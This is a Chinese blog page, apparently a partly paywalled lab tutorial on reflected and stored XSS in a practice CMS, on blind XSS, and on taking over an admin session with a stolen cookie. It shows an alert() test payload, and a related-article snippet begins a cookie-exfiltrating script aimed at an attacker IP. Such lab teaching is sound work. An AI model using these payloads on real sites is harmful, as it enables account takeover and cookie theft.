XSS盲打练习(简单认识反射型、存储型XSS和cookie欺骗)

最新推荐文章于 2024-11-11 15:57:54 发布
最新推荐文章于 2024-11-11 15:57:54 发布
阅读量502 收藏 1
点赞数 2
分类专栏: 网络安全 文章标签: xss 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56578216/article/details/132492747
版权
本文介绍了如何挖掘CMS网站的XSS漏洞,包括反射型XSS和存储型XSS的识别与利用。通过XSS平台进行盲打CMS,成功获取后台管理cookie,并详细讲解了利用cookie欺骗实现管理员账户登录的过程。
摘要由CSDN通过智能技术生成

文章目录

挖掘cms网站XSS漏洞

来到cms网站主页,发现有一个搜索框,输入任意内容后搜索,发现内容会回显,这里可能存在反射型XSS漏洞,输入:

<script>alert(/帅哥你好/)</script>

如果存在漏洞,这段代码会被页面的JS解释器编译并执行,点击搜索

在这里插入图片描述

出现弹窗,存在反射型XSS漏洞:

在这里插入图片描述

在CMS的留言板查看,发现它也有输入框,在其中输入JS代码并留言,点击提交:

在这里插入图片描述

提交后如果留言被管理员审核通过

了解本专栏 订阅专栏 解锁全文 超级会员免费看
EMT00923
关注
专栏目录
订阅专栏
Pikachu之XSS
weixin_48621644的博客
10-14 3184
小羊学安全 任重而道远~
XSS 盲打练习
weixin_51494407的博客
11-15 52
是 JavaScript 的一个内置属性,用于获取当前网页的 Cookie。通过将这两部分拼接起来,将会生成一个完整的图像 URL。: 这是一个 JavaScript 方法,用于将指定的内容写入到文档中。在这段代码中,它将会写入一段 HTML 代码。: 这是 HTML 中用于包含 JavaScript 代码的标签。属性指定了图像的 URL,它的值是一个字符串拼接操作。整体来说,这段代码的目的是将当前网页的 Cookie 发送到。这段代码是一个 JavaScript 脚本,它包含在。攻击机开启端口监听等待。
XSS攻击:简单盲打实验
weixin_43726152的博客
05-13 387
什么是盲打? 就是提交的恶意js给后台,但前端是看不见的,我们就不知道这里是否有漏洞。 比如意见箱: 但是值得试试,因为一旦管理员进入后台查看,就会中招 我们这里重复做获取管理员cookie这个实验,获取了管理员的cookie危害很大,攻击者可以用这个管理员cookie免密登入: 目标主机:win10 192.168.56.133 攻击主机:win10 192.168.56.132 构造payload <script>document.location = 'http://192.168.56
漏洞复现篇——利用XSS漏洞获取cookie
爱国小白帽
02-20 3062
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场
XSS盲打以及实验的演示
gl620321的博客
04-27 795
一.XSS盲打 XSS绕过的姿势有很多种,取决于你的思路和对前端技术的掌握 在网页源代码中查看自己在前端输入的内容时“CTRL+F”即可输入 1.打开pikachu中的XSS盲打 2.打开右上角的提示链接网页到后台查看自己的提交情况 二。XSS的绕过思路讲解 操作过程 可以打开网页查看源代码 三.XSS之htmlspecialchars()函数绕过 在网页中查看源代码 四.XS...
XSS盲打实战与Cookie欺骗
yuan_boss的博客
08-27 1619
设置好之后,直接访问admin的首页http://localhost/cms/admin/index.php,可以直接到达后台,从而达到了cookie欺骗的目的。领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?本教程实战简单xss注入,并利用存储xss注入,获取cms靶场的后台管理员的cookie,从而实现免密登录。利用xsspt平台的xss注入,获取管理员cookie:https://xss.pt/
【CTF Web】Pikachu xss盲打 Writeup(存储XSS+目录扫描+暴力破解+XSS盲打
HEX9CF的技术博客
10-02 740
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类:1.反射XSS;2.存储XSS;3.DOMXSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
WEB攻防-XSS跨站&反射&存储&DOM&标签闭合&输入输出&JS代码解析
siu~
09-08 277
1、XSS跨站-输入输出-原理&分类&闭合 2、XSS跨站-分类测试-反射&存储&DOM
052-WEB攻防-XSS跨站脚本攻击&反射&存储&DOM&标签闭合&输入输出&JS代码解析
wushangyu32335的博客
03-10 1323
小迪安全2023笔记
Pikachu靶场:XSS盲打
witwitwiter的博客
04-17 2162
Pikachu靶场:XSS盲打 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●xss盲打也是属于存储XSS 盲打的意思是无法直接在前端看到反馈效果。 xss盲打交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储XSS漏洞跟反射形成的原因一样,不同的是存储XSS下攻击者可以
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
1. **存储XSS(Persistent XSS)**:恶意脚本被存储服务器端,并在多个用户访问同一页面时执行。 2. **反射XSS(Non-Persistent XSS)**:恶意脚本通过URL参数传递,只有当用户点击特殊构造的链接时才会执行。...
SQL Inject注入漏洞防范/sqlmap工具使用入门及案例介绍/XSS基本概念和原理介绍/反射XSS存储XSS漏洞实验演示和讲解/nmap下载安装
qq_44696653的博客
04-15 682
SQL Inject注入漏洞的防范(以摘录为主) SQL Inject注入漏洞的防范可分为两部分:代码层面和网络层面。 代码层面:1.对输入进行严格的转义和过滤。2.使用预处理和参数化 网络层面:1.通过WAF设备启用防SQL Inject注入策略(或类似防护系统) 2.云端防护(360网站卫士,阿里云盾等) PHP防范转义+过滤:以php为例,可以写一个函数对前端输入进来的数据进行转义,将里面的...
反射XSS--理论
m0_56019217的博客
11-07 947
攻击者事先在Web页面中植入恶意代码,一般是攻击链接。当用户进入页面时,恶意代码不会自动执行,而是需要用户自己去点击链接后,反射XSS攻击才会进行。理论就是这么多,接下来我们举几个实例,来熟悉反射XSS攻击的原理与恶意代码的形式。
XSS过滤器Filter实现
开发随笔-猫咪酱
11-08 1123
针对xxs攻击实现XssFilter实战,后端全代码解析。其中包括过滤器实现代码和配置类以及ApplicationContextUtils、multipartResolver配置
xss的过滤和绕过(2)
2402_87039650的博客
11-09 1204
常见的过滤方式是用户输入的标签进行限制,如果采用黑名单的方式,我们可以寻找黑名单中遗漏的标签,在https://portswigger.net/web-security/cross-site-scripting/cheat-sheet这个表中列举了大量的可以用于执行JavaScript的标签和属性,并给出了适用于哪些浏览器。如果没有过滤"<"和">",可以直接引入新的标签,如果尖括号被过滤,可以插入新的事件属性,比如onload,onmousemove等。CSP被设计成完全向后兼容。
渗透利器-kali工具 (第三章-6) Xss漏洞学习之-Beef-Xss
最新发布
ztc131450的博客
11-11 477
注入攻击的本质,是把用户输入的数据当做代码执行。条件:用户能够控制值输入原本要执行的代码,拼接了用户输入的数据。
Laravel 安全实践:如何防止 XSS 攻击
11-08 676
在当今的网络环境中,应用程序的安全性越来越受到开发者和企业的重视。跨站脚本攻击(XSS)是常见的网络安全威胁之一,它通过在目标网站上注入恶意脚本,窃取用户信息或执行恶意操作。作为流行的 PHP 框架,Laravel 为我们提供了多种工具和方法来保护我们的应用程序免受 XSS 攻击。来清理输入值,并检查清理后的值是否与原始值相同。在这个例子中,我们使用了 HTMLPurifier 库来清理输入值,并检查清理后的值是否与原始值相同。在 Laravel 中,获取用户输入通常是通过 Request 对象来实现的。
XSS详解
QQ_778132974的博客
11-08 562
总之,XSS攻击是一种严重的安全威胁,但通过采取适当的防御措施,可以有效地降低其风险。XSS,全称是跨站脚本攻击(Cross-site scripting,简称:XSS),是一种网站应用程序的安全漏洞攻击,是代码注入的一种。攻击者可以利用XSS漏洞旁路同源策略(SOP)的安全限制,从而执行一些恶意的操作,比如窃取用户的Cookie、会话令牌,或者对受害者进行重定向等。为了防止XSS攻击,可以采取以下措施:输入验证和转义:对所有用户输入进行严格的验证和转义,以防止恶意脚本的注入。
ctfshow(319->326)--XSS漏洞--反射XSS
m0_56019217的博客
11-08 705
先测试过滤,发现过滤了script、img,没有过滤body,svg得到flag.
XSS攻击类详解:反射存储与DOM
可信路径XSS结合了反射存储XSS的特点,既有反射阶段(服务器转发用户请求),也有存储阶段(脚本保存在可信的位置)。这种类XSS通常更难检测和防御,因为它利用了服务器的信任机制和缓存,攻击者可以在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

EMT00923

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值